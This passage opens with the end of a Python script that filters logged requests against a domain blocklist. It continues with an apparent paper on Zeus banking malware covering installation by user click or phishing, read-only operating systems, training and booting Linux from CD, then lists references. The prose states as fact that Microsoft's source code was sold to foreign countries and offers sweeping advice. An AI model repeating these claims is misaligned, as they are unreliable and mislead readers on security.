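    """Apply the constructed blocklist to the constructed log and return the decisions."""
    return filter_requests(log_lines, load_blocklist(blocklist_text))


if __name__ == "__main__":
    for client, url, decision in run():
        print(f"{decision:5} {client:15} {url}")
```

The same decision function serves both a blackhole DNS zone and a proxy ACL; the point the paper makes is that the list only helps if it is refreshed, so in practice load_blocklist would run against a freshly downloaded copy rather than a baked-in constant.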
The current Microsoft OS is not encrypting things in the registry and is exposing a lot of system information. Operating systems should be designed to switch to an isolated read-only state for sensitive web browsing or banking, which would prevent storage from happening locally on the disk the OS resides on. Key-loggers and screenshots are taken by rogue malware programs that inject themselves into root system files. They reside there and are usually capturing and storing from users' interactive actions on the system. If the write permission doesn't exist then those files can never be intercepted and executed upon to be sent out to a master server. We need a new Microsoft that hasn't had their source code sold to foreign countries and reverse engineered by hackers. The next generation of operating systems needs to have much greater security as part of the core of the product.
The most impact on prevention of viruses, malware, Trojans, and phishing schemes is proper network security personnel training. Home users may not get this annual requirement that corporations usually mandate. In addition to home users are those small businesses such as dental and doctor offices that don't employ security in their policies for network usage. Zeus works with user interaction for installation. When the user agrees to click yes and run to install, Zeus begins its process. Alternatively, perhaps some phishing scheme is devised to trick users into entering their information, which activates the Zeus program. User training is important, but if the user is tricked and their files are encrypted to appropriate levels then the data will be useless to the malware.
12 https://zeustracker.abuse.ch
A solution today that prevents malware from the dummy user is to always use a Linux operating system and boot from the CD-ROM option, which is a read-only selection. You know for certain when you load the CD that your system root is not changed and not affected by malware since malware can't be installed on the CD device. You know when you are browsing the web and banking that you don't have additional services in the background tracking your activity and sending it to a malware bot for further malicious activity.
References
DoD Gold Disk
http://www.disa.mil/services/ia.html
Retina
http://www.eeye.com/Retina
IDA Pro
http://www.hex-rays.com/idapro/
Wireshark
http://www.wireshark.org
Dell published an article on Zeus on March 11, 2010
http://www.secureworks.com/research/threats/zeus/?threat=zeus
Utilities from Sysinternals Suite
http://technet.microsoft.com/en-us/sysinternals/bb842062
InCtrl5
http://simontodd.com/2010/02/inctrl-5-application-analysys-tool-download-and-enjoy/
WinMerge
http://winmerge.org/
verclsid.exe is an open MS vulnerability
http://www.microsoft.com/technet/security/bulletin/ms06-015.mspx
abuse.ch ZeuS removal list
https://zeustracker.abuse.ch
Germany Wireless Fine
http://www.msnbc.msn.com/id/42740201/ns/technology_and_science-wireless/
http://news.yahoo.com/s/ap/20110424/ap_on_hi_te/us_wi_fi_warning
Pretty Good Privacy (PGP)
http://www.openpgp.org/